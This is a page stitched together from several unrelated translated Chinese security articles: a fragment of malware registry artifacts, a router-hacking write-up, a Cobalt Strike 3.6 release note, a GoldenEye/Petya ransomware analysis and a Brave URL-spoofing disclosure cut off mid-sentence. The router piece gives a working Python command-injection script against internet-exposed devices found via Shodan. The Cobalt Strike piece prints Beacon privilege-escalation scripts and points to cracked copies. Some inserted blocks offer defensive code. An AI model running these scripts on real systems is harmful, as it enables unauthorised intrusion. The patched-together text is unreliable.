HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = "v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\explorer.exe|Name=Windows Explorer|"

HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\{variable GUID} = "v2.10|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|App=C:\\Windows\\system32\\rundll32.exe|Name=Windows host process (Rundll32)|"

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\0TheftProtectionDll = {guid1}
HKLM\SOFTWARE\Classes\CLSID\{guid1} = "Windows Theft Protection"
HKLM\SOFTWARE\Classes\CLSID\{guid1}\InprocServer32 = "C:\\ProgramData\\Microsoft\\Performance\\TheftProtection\\TheftProtection.dll"
HKLM\SOFTWARE\Classes\CLSID\{guid1}\InprocServer32\ThreadingModel = "Apartment"

HKLM\SOFTWARE\Classes\CLSID\{guid2}

This {guid2} entry varies between samples and has sub-keys with 6-character-long names, whose contents are used to store encrypted binary variables: temporary values and settings, IPs, C&C, UID.

For example, the {guid2} entries look like:


Hacker and Hunger: from weak internal passwords to public-facing smart routers

Background:

While scanning the company intranet hosts for weak SSH passwords, I found several weak passwords. After logging in successfully I found it was the smashclp service, as shown below:

Then I ran an nmap scan against this IP, found port 80 open, and accessed it directly.

Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
199/tcp  open  smux
427/tcp  open  svrloc
443/tcp  open  https
5120/tcp open  barracuda-bbs

Here, the interesting part is the header information in the HTTP response; you can see

Server: GoAhead-Webs

I used shodan.io to search for this string to see if there was anything new to discover.

Finding vulnerabilities:

Search on Shodan

https://www.shodan.io/search?query=GoAhead-Webs+country%3A%22CN%22

The results were as follows

Looking closely at the search results was disappointing: no IPMI hosts turned up (such systems are probably not usually exposed to the internet, let alone with weak passwords). I then clicked a few other IPs at random and found monitoring devices with weak passwords, and then routers.

So, let's continue with these router devices. The router's IP is 111.111.111.111:81; accessing it redirects to http://111.111.111.111:81/home_H1.asp

The interface looks like this

There are also ones like this

And ones like this

Digging for vulnerabilities:

Router vulnerabilities are usually command execution, typically in the ping service; another possible vulnerability is a login bypass.

Here, on an IP that could be accessed directly, going to System Management => System Tools and using the ping service, entering t.cn|ls and the like gives command execution. As shown below

Here is a script I wrote to make command execution easier, as follows

#!/usr/bin/env python3
# coding=utf-8
# author=Tonybreak
'''
requests and BeautifulSoup need to be installed:
pip install requests
pip install beautifulsoup4
Command execution is slow by itself because of network problems; please wait.
'''
import requests as rq
from bs4 import BeautifulSoup

# change this to the target IP and port
host = '111.111.111.111:81'


def bs(html):
    soup = BeautifulSoup(html, 'html.parser')
    return soup


def cmd():
    p_url = "http://%s/goform/sysTools" % host
    cmds = input('Plz input cmd:')
    data = 'tool=0&pingCount=4&host=t.cn%7C' + cmds + '&sumbit=%E7%A1%AE%E5%AE%9A'
    dd = rq.post(url=p_url, data=data).content
    mm = bs(dd)
    a = mm.find('textarea', {'readonly': '1'}).get_text()
    print(a)


if __name__ == '__main__':
    while True:
        try:
            cmd()
        except Exception:
            continue

The result is as follows

Since it is an incomplete Linux system, some commands are unavailable, but fortunately wget works.
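As an added example (not code from this article or from the router vendor), the hardened form of the ping feature abused above: the host parameter is validated as an IP literal or a well-formed host name and ping is started from an argument list with no shell, so a value like t.cn|ls is rejected before it could ever reach a shell. Function names and the count limit are my own choices.

```python
import ipaddress
import re
import subprocess
from typing import List

# RFC 1123 host name: dot-separated labels of letters, digits and inner hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def validate_host(host: str) -> str:
    """Accept only an IP literal or a well-formed host name; anything else is rejected."""
    host = host.strip()
    try:
        return str(ipaddress.ip_address(host))   # also normalises IPv6 spellings
    except ValueError:
        pass
    if HOSTNAME_RE.match(host):
        return host
    raise ValueError(f"rejected ping target {host!r}")


def build_ping_command(host: str, count: str = "4") -> List[str]:
    """Argument vector for ping: without a shell, '|', ';' or '`' are just bytes in a name."""
    n = int(count)                       # a non-numeric pingCount fails loudly here
    if not 1 <= n <= 10:
        raise ValueError("pingCount out of range")
    return ["ping", "-c", str(n), validate_host(host)]


def run_ping(host: str, count: str = "4") -> str:
    """Run ping with shell=False and a timeout; returns its combined output."""
    proc = subprocess.run(build_ping_command(host, count), capture_output=True,
                          text=True, timeout=30, check=False)
    return proc.stdout + proc.stderr
```

The vulnerable original pattern is the same two parameters interpolated into a shell command string; the fix is validation plus an argument list, not escaping.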

Of the three interfaces above, the third requires login; one could consider guessing the password or a bypass, but I did not go further here.

Summary:

As with the previous article, there is nothing particularly technical here; it was mainly about going from a single point to the broader picture and expanding a little to find these vulnerabilities. Smart routers sound smart, but may not actually be; perhaps your home network has been hijacked by one again?

Vendors are advised to fix the vulnerabilities quickly.

If you have any questions, feel free to leave a comment.

Sample IPs can be found here

https://www.shodan.io/search?query=home_H1.asp

https://www.zoomeye.org/search?q=home_H1.asp%20port%3A81%20country%3AChina&p=1&t=host

中国骇客云 (China Hacker Cloud) tools: privilege escalation tool Cobalt Strike releases version 3.6

Introduction

Cobalt Strike 3.6 has been officially released. This version adds an API for invoking third-party privilege-escalation exploits from Beacon, and extends Malleable C2 to support HTTP C&C that does not use HTTP POST. The release also fixes and improves issues present in previous versions. Cracked copies of version 3.5 can currently be found online, and there are quite a few resources on FB about the cracks and tool usage tips.

The perfect crack for the latest CobaltStrike

How to make a cracked Cobalt Strike v2.5

Installing and cracking the latest Cobalt Strike on Kali 2.0

Some tips on analysing Cobalt Strike's beacon.dll

Privilege escalation API

This version adds an API to integrate privilege-escalation exploits into Beacon's elevate command.

Below, using the MS16-032 vulnerability discovered by FuzzySec as an example, a modified PowerShell Empire module is integrated into Beacon:

sub ms16_032_exploit {
    local('$script $oneliner');

    # acknowledge this command
    btask($1, "Tasked Beacon to run " . listener_describe($2) . " via ms16-032");

    # generate a PowerShell script to run our Beacon listener
    $script = artifact($2, "powershell");

    # host this script within this Beacon
    $oneliner = beacon_host_script($1, $script);

    # task Beacon to run this exploit with our one-liner that runs Beacon
    bpowershell_import!($1, script_resource("modules/Invoke-MS16032.ps1"));
    bpowerpick!($1, "Invoke-MS16032 -Command \" $+ $oneliner $+ \"");

    # give it another 10s to work.
    bpause($1, 10000);

    # handle staging
    bstage($1, $null, $2);
}

beacon_exploit_register("ms16-032", "Secondary Logon Handle Privilege Escalation (CVE-2016-099)", &ms16_032_exploit);

Next, let's try something else. The Metasploit Framework has many privilege-escalation exploits built on the principle of reflective DLL injection.

Flow of a Metasploit privilege-escalation exploit

First a patsy process is spawned, then the exploit is injected into the patsy process, then the stager shellcode payload is injected into the patsy process, and finally the exploit DLL is run with a pointer to the shellcode that has already been injected.

You may wonder whether these DLLs can still be used in Beacon. Thanks to the bdllspawn function in Aggressor Script, they can. This function runs a reflective DLL as a Beacon post-exploitation job; it can pass an arbitrary parameter to the DLL and can monitor its standard output.

The following script is a Beacon payload using ms15_051_client_copy_image:

sub ms15_051_exploit {
    # acknowledge this command
    btask($1, "Task Beacon to run " . listener_describe($2) . " via ms15-051");

    # tune our parameters based on the target arch
    if (-is64 $1) {
        $arch   = "x64";
        $dll    = "modules/cve-2015-1701.x64.dll";
    }
    else {
        $arch   = "x86";
        $dll    = "modules/cve-2015-1701.x86.dll";
    }

    # generate our shellcode
    $stager = shellcode($2, false, $arch);

    # make sure we have shellcode for this listener (some stagers are x86 only)
    if ($stager is $null) {
        berror($1, "No $arch stager for listener ' $+ $2 $+ '");
        return;
    }

    # spawn a Beacon post-ex job with the exploit DLL
    bdllspawn!($1, script_resource($dll), $stager, "ms15-051", 5000);

    # stage our payload (if this is a bind payload)
    bstage($1, $null, $2, $arch);
}

beacon_exploit_register("ms15-051", "Windows ClientCopyImage Win32k Exploit (CVE 2015-1701)", &ms15_051_exploit);

These functions make it easier for your team to integrate custom functionality into Cobalt Strike and to quickly adapt new exploits in Beacon.

Elevate Kit

If you want more privilege-escalation examples, see the Elevate Kit. You can also refer to the Aggressor Script, which demonstrates how to use PowerShell and reflective DLL exploits in Cobalt Strike's Beacon payload.

Using the Elevate Kit: download the ElevateKit files and extract them into Cobalt Strike, go to Cobalt Strike -> Scripts, click Load, and select elevate.cna

In Beacon: type elevate to see the currently loaded exploits. Type elevate [exploit name] [listener] to run the exploit against the current Beacon session.

Malleable C2

The screenshot below shows Beacon's communication with the webbug_getonly profile.

Can you guess which side is Beacon's request to Cobalt Strike to download tasks, and which side is Beacon's response to Cobalt Strike?

This release greatly increases the flexibility of Beacon's HTTP communication through Malleable C2. You can now set the HTTP verb for Beacon's http-get and http-post handling. You can also push Beacon's response into the URI, a header or a parameter. And Beacon automatically chunks its response (using multiple requests) to fit the constraints of an HTTP GET-only channel.

If you enjoy the challenge of profile tricks and analysis, I think this will give you more to enjoy. These changes also make "simulating" the HTTP communication of different malware more accurate.

Click the release notes for the full list of new features in Cobalt Strike 3.6. Licensed users can get the update with the update program, and a 21-day Cobalt Strike trial version has also been released.

Note: due to US export control requirements, you need a global VPN to access the trial download page. Also, the trial version does not encrypt Beacon tasks and responses, so it is only recommended for lab environments, never for production. Licensed users have no such limitation.

MBR ransomware trojan strikes again: hackerschina, China Cloud trojan, goole

As early as the first half of this year, Petya, the highly destructive ransomware trojan that modifies the MBR and encrypts the MFT (Master File Table), drew close attention from antivirus vendors. In the second half of the year, the 360 whitelist analysis team captured the same author's latest ransomware trojan, "GoldenEye". Over the past six months the trojan author's arms race with antivirus software has kept escalating, and the new ransomware is noticeably harder to detect and remove.

1. Main flow

Figure 1: GoldenEye trojan flow chart

2. Shellcode section

To disguise itself, GoldenEye embeds malicious shellcode in Microsoft's open-source ZoomIt code.

Figure 2: strings from Microsoft's open-source ZoomIt in GoldenEye

The shellcode goes through several layers of SMC decryption to produce the GoldenEye body, which is executed by a PE loader.

Figure 3: the shellcode decrypting the GoldenEye code

Next, the loader's xxxx section is decrypted; it contains Petya and the privilege-escalation DLLs (elevate_x86.dll/elevate_x64.dll), and the APIs are loaded dynamically.

Figure 4: decrypting the loader's xxxx section

3. Disguise

If the main program is not in the %AppData% directory, the disguise routine runs; otherwise the encryption routine runs.

Figure 5: choosing the routine based on the program path

It confuses users by disguising itself as a system file.

Figure 6: copying itself to %appdata%\UUID\rsvp.exe

Here rsvp.exe is an arbitrary system file name obtained by matching the following patterns with FindFirstFileA:

\system32\w*w.exe
l*x.exe
m*p.exe
l*h.exe
a*r.exe
g*d.exe
f*i.exe
a*v.exe
o*i.exe
y*n.exe
l*h.exe
h*q.exe
p*b.exe
m*d.exe

Figure 7: FindFirstFileA looking for any matching system file

UuidCreate creates a random UUID, such as {0a993d81-16ef-454e-84a0-4cf182e67159} in figure 6.

Figure 8: UuidCreate creating a random UUID

It calls UpdateResource to replace GoldenEye's version resource data with that of the legitimate system file, and sets GoldenEye's file times to match kernel32.dll.

Figure 9: GoldenEye taking the version resource of a legitimate system file and updating the copied file with it

It creates a process to run the disguised GoldenEye.

Figure 10: invoking the disguised GoldenEye

4. Payload selection

First the dark-web address and the user identification KEY are decrypted; the dark-web address plus the first 8 characters of the user ID hash is the URL where the user pays the ransom.

Figure 11: the generation algorithm for GoldenEye's dark-web URL

It then decides the execution flow using VerifyVersionInfoW (system version) and GetTokenInformation (administrator rights): with administrator rights it runs Petya, otherwise Mischa.

Two hash strings are generated from the hard disk's physical serial number and used as the names of mutexes.

The mutexes prevent the same encryption flow from being executed more than once.

Figure 12: deciding the execution flow

5. Petya module

Figure 13: Petya execution flow

Petya triggers the encryption flow by writing data to the MBR and calling NtRaiseHardError to force a reboot.

Figure 14: key code of the Petya part that writes the MBR and forces a reboot

After a Petya infection, the malicious data is laid out on the system disk as follows:

Figure 15: sector layout after Petya infection

Sector 0x20 holds the configuration data, which includes the Salsa20 key material.

Figure 16: Petya configuration data

The Salsa20 encryption key is wiped after encryption, while the IV is left unchanged.

Figure 17: wiping the Salsa20 encryption key

Sector 0x22 holds the encrypted original MBR, which Petya uses to locate the MFT and then encrypt it, two sectors at a time; the progress bar is updated every 0x40 sectors.

Figure 18: key code for encrypting the MFT

The old version of Petya used a simplified Salsa20 to encrypt the MFT (Master File Table), which had a weakness allowing the key to be brute-forced, so the new version of Petya fixes the brute-force weakness and strengthens the Salsa20 algorithm; the password length check was extended to 32 bytes.

Figure 19: password length check

Salsa20 decrypts sector 0x21 with the entered key; if all the decrypted data is 0x07, the check passes.

Figure 20: verifying the data in sector 0x21
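As an added example (not code from this analysis or from the malware), the key check of figures 19 and 20 carried through in Python: a self-contained Salsa20/20 keystream, and a check that a 32-byte key decrypts the verification sector to 512 bytes of 0x07. Assumptions: standard Salsa20/20 with a 32-byte key and 8-byte nonce (the unchanged IV from the configuration sector), block counter starting at 0 for sector 0x21; the test sector is constructed by encrypting a 0x07-filled sector with a known key.

```python
import struct

MASK = 0xFFFFFFFF
SIGMA = struct.unpack("<4I", b"expand 32-byte k")   # Salsa20 constants for 32-byte keys
SECTOR = 512
VERIFY_FILL = 0x07                                    # expected content of sector 0x21


def _rotl(v: int, n: int) -> int:
    return ((v << n) & MASK) | (v >> (32 - n))


def _quarter(a: int, b: int, c: int, d: int):
    """Salsa20 quarterround on (y0, y1, y2, y3)."""
    b ^= _rotl((a + d) & MASK, 7)
    c ^= _rotl((b + a) & MASK, 9)
    d ^= _rotl((c + b) & MASK, 13)
    a ^= _rotl((d + c) & MASK, 18)
    return a, b, c, d


def salsa20_block(key: bytes, nonce: bytes, counter: int) -> bytes:
    """One 64-byte Salsa20/20 keystream block (32-byte key, 8-byte nonce, 64-bit counter)."""
    k = struct.unpack("<8I", key)
    n = struct.unpack("<2I", nonce)
    state = [SIGMA[0], *k[:4], SIGMA[1], *n, counter & MASK, (counter >> 32) & MASK,
             SIGMA[2], *k[4:], SIGMA[3]]
    x = list(state)
    for _ in range(10):                       # 10 double rounds = 20 rounds
        for a, b, c, d in ((0, 4, 8, 12), (5, 9, 13, 1), (10, 14, 2, 6), (15, 3, 7, 11),   # columns
                           (0, 1, 2, 3), (5, 6, 7, 4), (10, 11, 8, 9), (15, 12, 13, 14)):  # rows
            x[a], x[b], x[c], x[d] = _quarter(x[a], x[b], x[c], x[d])
    return struct.pack("<16I", *((xi + si) & MASK for xi, si in zip(x, state)))


def salsa20_xor(key: bytes, nonce: bytes, data: bytes, counter: int = 0) -> bytes:
    """Encrypt or decrypt (same operation) by XORing data with the keystream."""
    out = bytearray()
    for i in range(0, len(data), 64):
        block = salsa20_block(key, nonce, counter + i // 64)
        out += bytes(p ^ s for p, s in zip(data[i:i + 64], block))
    return bytes(out)


def key_unlocks(key: bytes, nonce: bytes, verification_sector: bytes) -> bool:
    """The check from figures 19 and 20: a 32-byte key is right when sector 0x21
    decrypts to nothing but 0x07 bytes."""
    if len(key) != 32:                        # length check before any decryption
        return False
    if len(verification_sector) != SECTOR:
        raise ValueError("verification sector must be exactly one 512-byte sector")
    return salsa20_xor(key, nonce, verification_sector) == bytes([VERIFY_FILL]) * SECTOR


def make_verification_sector(key: bytes, nonce: bytes) -> bytes:
    """Constructed test data: what sector 0x21 looks like after encryption with `key`."""
    return salsa20_xor(key, nonce, bytes([VERIFY_FILL]) * SECTOR)
```

This is the step a recovery tool performs when it tries candidate keys against sector 0x21; the encrypted MFT itself is never touched until the check passes.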

Petya only encrypts the MFT (Master File Table) when the partition scheme is MBR and the file system is NTFS; otherwise it only modifies the MBR and displays the yellow skull, which means the system can be restored simply by repairing the MBR. Because Petya only encrypts the MFT and not file contents, files can also be recovered directly with partition recovery tools.

Figure 21: checking the disk partition scheme

Figure 22: checking the file system format
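As an added example (not code from this analysis), the two pre-conditions of figures 21 and 22 expressed as a disk-image triage check in Python: it parses the MBR partition table, treats a 0xEE protective entry as GPT, and reads the OEM ID of the first partition's boot sector to tell NTFS from anything else. How exactly the malware performs these checks is not shown on the page; taking the first non-empty partition entry and testing the OEM ID are my assumptions. The two-sector "disk" is constructed for the test.

```python
import struct
from typing import Callable, Dict, List

SECTOR = 512
PARTITION_TABLE_OFFSET = 446
MBR_SIGNATURE = 0xAA55
GPT_PROTECTIVE = 0xEE          # partition type of the protective MBR entry on GPT disks
NTFS_OEM_ID = b"NTFS    "      # 8-byte OEM ID at offset 3 of an NTFS volume boot record


def parse_partition_table(mbr: bytes) -> List[Dict[str, int]]:
    """Decode the four 16-byte primary partition entries of an MBR sector."""
    if len(mbr) != SECTOR or struct.unpack_from("<H", mbr, 510)[0] != MBR_SIGNATURE:
        raise ValueError("not an MBR sector")
    entries = []
    for i in range(4):
        off = PARTITION_TABLE_OFFSET + 16 * i
        lba_start, sectors = struct.unpack_from("<II", mbr, off + 8)
        entries.append({"active": mbr[off] == 0x80, "type": mbr[off + 4],
                        "lba_start": lba_start, "sectors": sectors})
    return entries


def mft_at_risk(mbr: bytes, read_sector: Callable[[int], bytes]) -> bool:
    """True when both checks pass: MBR partitioning (no GPT protective partition)
    and an NTFS boot sector on the first partition; False means only the MBR itself
    would be overwritten and a plain MBR repair restores the system."""
    entries = parse_partition_table(mbr)
    if any(e["type"] == GPT_PROTECTIVE for e in entries):
        return False
    first = next((e for e in entries if e["type"] != 0), None)
    if first is None:
        return False
    vbr = read_sector(first["lba_start"])
    return vbr[3:11] == NTFS_OEM_ID


def build_test_disk(ptype: int, oem_id: bytes) -> Dict[int, bytes]:
    """Constructed two-sector disk: an MBR with one partition at LBA 2048 plus its boot sector."""
    mbr = bytearray(SECTOR)
    struct.pack_into("<B3sB3sII", mbr, PARTITION_TABLE_OFFSET,
                     0x80, b"\0\0\0", ptype, b"\0\0\0", 2048, 4096)
    struct.pack_into("<H", mbr, 510, MBR_SIGNATURE)
    vbr = bytearray(SECTOR)
    vbr[0:3] = b"\xEB\x52\x90"            # jump instruction that opens a boot sector
    vbr[3:11] = oem_id
    struct.pack_into("<H", vbr, 510, MBR_SIGNATURE)
    return {0: bytes(mbr), 2048: bytes(vbr)}
```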

6. Mischa module

Figure 23: basic flow of the Mischa module

From the code we can see that Mischa can encrypt hard disks as well as removable disks.

Figure 24: enumerating hard disks and removable disks

It encrypts files with the following fixed extensions:

Figure 25: extensions of the files to be encrypted

Mischa checks the file size; if a file is larger than 32MB, only 5MB of its data is encrypted.

Figure 26: checking the file size

Mischa's file names consist of the original file name and the first 8 characters of the user identification key:

Figure 27: renaming the file

Mischa encrypts file contents with AES-256, 0x400 bytes at a time. For every file to be encrypted, the AES-256 key is fixed; only the randomly generated IV differs.

Figure 28: encrypting the file contents

After encrypting a file, it writes 0x76 bytes of decryption-related configuration at the end of the file.

Figure 29: memory layout of the configuration data

Finally it drops YOUR_FILES_ARE_ENCRYPTED.TXT to tell the user that their files have been encrypted.

It is worth mentioning that after Mischa finishes encrypting, GoldenEye does not stop there: it re-runs the Petya flow to encrypt the MFT.

On newer systems, reading and writing the MBR requires administrator rights, so GoldenEye uses the elevate_x86.dll/elevate_x64.dll decrypted from the xxxx section to escalate privileges, so that Petya can run successfully.

The privilege escalation works by finding a whitelisted system file and performing DLL hijacking against it.

Figure 30: entry-point code after DLL hijacking

Figure 31: re-executing GoldenEye

7. GoldenEye ransom note

After the malicious code finishes executing, it forces the computer to reboot and displays the ransom note:

Figure 32: GoldenEye trojan ransom screen

GoldenEye's ransom is 1.3 bitcoin, and its extortion is much milder than Petya's: the ransom no longer doubles when a deadline is missed. GoldenEye performs a simple check on the entered string and reports case errors or other errors until the correct data is entered.

Figure 33: prompt for the identification code

After the correct identification code is entered, the ransom amount is shown.

Figure 34: bitcoin amount prompt

Finally it provides the account for paying the ransom.

Figure 35: bitcoin payment address prompt

8. 360 Antivirus detects and removes it completely

GoldenEye spreads mainly via "job application spam" e-mails, luring victims into opening the malicious attachments. The first attachment is a PDF document disguised as a serious job application letter, followed by an Excel document containing macro malware. A reminder to all users: back up important data regularly. Also, do not double-click suspicious programs or scripts (exe, scr, js etc.) sent by others; this is the best way to avoid infection.

中国骇客云 (China Hacker Cloud) 0day, latest vulnerability: Brave browser security flaw disclosed: attackers can spoof the URL to deceive users

As open-source software, Brave has always been known for security features such as ad blocking and protection against cookie tracking and pixel tracking. Product security has always been a top priority for its developers, who run a bug bounty programme on HackerOne to encourage the security community to help improve the product's reliability.

This vulnerability was first disclosed by security researcher Aaditya Purani on HackerOne. He found that an attacker could use a browser flaw to spoof the URL of a forged web page; once a user visited it, personal information could be leaked, and the attacker could serve malware or phish from the fake page.

In short, the victim still sees the familiar address in the address bar, but the page content is controlled by the attacker.

"We thought the address bar was the one security indicator we could still trust," many companies lamented.

Reproducing the vulnerability

Here is how Purani did it:

First he wrote a page to spoof the Brave address bar (bravespoof.html). To simulate the victim's environment, the page also contained a form asking for a login name and password. The key step: he wrote a function f() that points to https://facebook.com and used setInterval to run f() every 10ms.

Normally this makes both the URL and the page content jump to https://facebook.com every 10ms when the page is visited (and sometimes neither the URL nor the page changes at all, but both cases are clearly safe). Purani found, however, that when the page was visited in Brave things were not so simple. In fact, whether you open his crafted page in the Android or the iOS Brave client, the URL changes to https://facebook.com (you can even see the green padlock), but the page is still the content Purani wrote.

This means a user in the habit of judging safety by the address bar could easily hand their credentials to the attacker behind the fake page. (Of course the attacker would need to make the page a bit more convincing :P)


How did other browsers react?

In Purani's tests on Chrome, the browser did not change the URL to https://facebook.com but stayed on his forged address. Mozilla reacted the same way. What satisfied Purani most was UC Mini (Android): both the URL and the page jumped straight to https://facebook.com, neutralising the attack. Safari was not affected either.

If you are interested in the full vulnerability report, click here

Yes, in his whole series of tests only Brave failed. The affected versions are:

IOS Version 1.2.16(16.09.30.10)

Android Version 1.9.56

If you are reading this and using one of the affected versions, there is no need to worry: this report was only published 3 months later (today), and the Brave security team fixed the issue within a week of discovery, so there is no negative impact for now.

Of course there was an upside: Purani received a $200 bounty for it. Purani had previously reported several high-severity vulnerabilities to various companies and organisations, such as the WordPress Mobile Detector plugin flaw. The cooperation between white hats and security platforms has not only helped many small and medium-sized